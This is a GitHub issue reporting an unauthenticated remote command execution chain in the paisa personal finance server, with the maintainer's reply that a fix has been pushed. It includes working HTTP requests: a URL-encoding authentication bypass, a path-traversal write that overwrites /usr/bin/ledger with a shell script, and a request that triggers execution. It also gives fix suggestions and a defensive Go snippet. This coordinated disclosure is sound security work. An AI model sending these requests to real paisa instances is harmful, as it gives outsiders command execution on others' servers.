ananthakumaran / paisa

Paisa – Personal Finance Manager. https://paisa.fyi demo: https://demo.paisa.fyi
GNU Affero General Public License v3.0

paisa <=v0.7.0 web server has an unauthorized remote command execution vulnerability #294

Open pankass opened 1 day ago

pankass commented 1 day ago

**Describe your Environment**
OS: Linux
Paisa Version: 0.7.0
App Variant: Docker

**Vulnerability description**
There is a vulnerability in Paisa's authentication mechanism. When the administrator sets up an account, an unauthorized attacker can bypass authentication by URL-encoding the HTTP request URI, and further use `/api/sheets/save` to overwrite the `/usr/bin/ledger` file to complete remote command execution.

**To Reproduce**
Steps to reproduce the behavior:

  1. We can use docker to start a paisa server.
  2. We can restrict unauthorized user access by setting up accounts, but the core authentication middleware has a vulnerability

Here `c.Request.RequestURI` is used to determine the route, but `c.Request.RequestURI` is the original request URI. The route selection of the gin framework is determined based on `c.Request.URL.Path`, so we can bypass the detection of this middleware by URL encoding, like this:

```http
GET /%61pi/config HTTP/1.1
Host: 127.0.0.1:7500
Connection: close
```

  3. After bypassing authentication, you can use the arbitrary file upload vulnerability of `/api/editor/validate` to overwrite the `/usr/bin/ledger` file

```http
POST /%61pi/sheets/save HTTP/1.1
Host: 127.0.0.1:7500
Connection: close
Content-Type: application/json
Content-Length: 60

{"name":"../../../usr/bin/ledger","content":"#!/bin/sh\nid"}
```

![image](https://github.com/user-attachments/assets/6818d107-b78e-4dcc-b1f7-d69295972d4f)

  4. Finally, use `/api/editor/validate` to trigger the execution command

```http
POST /%61pi/editor/validate HTTP/1.1
Host: 127.0.0.1:7500
Connection: close
Content-Type: application/json
Content-Length: 2

{}
```

![image](https://github.com/user-attachments/assets/0907585d-7c03-458a-93eb-53f9a9c7db83)

**Fix suggestions**
1. The [authentication middleware](https://github.com/ananthakumaran/paisa/blob/8430ad8ec6b7dabbf95fab1c1dae258f8dd319a9/internal/server/server.go#L413) should use `c.Request.URL.Path` instead of `c.Request.RequestURI`.
2. Fix the directory traversal vulnerability in [SaveSheetFile](https://github.com/ananthakumaran/paisa/blob/8430ad8ec6b7dabbf95fab1c1dae258f8dd319a9/internal/server/sheet.go#L65) caused by `../../`.
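The two fixes suggested above, as an added illustration that is not code from the paisa project: a route check on the decoded `URL.Path` placed beside a check on the raw `RequestURI` (so the `/%61pi/` case from the report is visible in both), plus a containment check for sheet names. The exact prefix form of the original middleware check and the `/data/sheets` directory are assumptions.

```go
package main

import (
	"errors"
	"fmt"
	"net/http"
	"net/http/httptest"
	"path"
	"path/filepath"
	"strings"
)

// protectedRaw mirrors the flawed check described in the report (assumed shape):
// it inspects RequestURI, which still carries percent-encoding such as "/%61pi/".
func protectedRaw(r *http.Request) bool {
	return strings.HasPrefix(r.RequestURI, "/api/")
}

// protectedDecoded checks the decoded, cleaned URL.Path, the value the router
// dispatches on, so "/%61pi/config" is seen as "/api/config".
func protectedDecoded(r *http.Request) bool {
	p := path.Clean("/" + r.URL.Path)
	return p == "/api" || strings.HasPrefix(p, "/api/")
}

// classify builds a server-side request for target (as a Go HTTP server would
// see it) and reports what each check decides.
func classify(target string) (raw, decoded bool) {
	r := httptest.NewRequest(http.MethodGet, target, nil)
	return protectedRaw(r), protectedDecoded(r)
}

// resolveSheetPath maps a user-supplied sheet name onto sheetsDir and refuses
// names that resolve outside it, such as "../../../usr/bin/ledger".
func resolveSheetPath(sheetsDir, name string) (string, error) {
	root := filepath.Clean(sheetsDir)
	full := filepath.Join(root, filepath.FromSlash(name)) // Join also cleans ".."
	rel, err := filepath.Rel(root, full)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", errors.New("sheet name escapes the sheets directory")
	}
	return full, nil
}

func main() {
	for _, t := range []string{"/api/config", "/%61pi/config", "/index.html"} {
		raw, dec := classify(t)
		fmt.Printf("%-16s raw-check=%v decoded-check=%v\n", t, raw, dec)
	}
	for _, n := range []string{"reports/2024.ledger", "../../../usr/bin/ledger"} {
		p, err := resolveSheetPath("/data/sheets", n) // constructed sample directory
		fmt.Printf("%-26s -> %q err=%v\n", n, p, err)
	}
}
```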

ananthakumaran commented 1 day ago

@pankass Thank you very much for the detailed report. I have pushed a fix to master and plan to release soon. If you are able to verify the fix let me know. Once again, thank you very much for your time.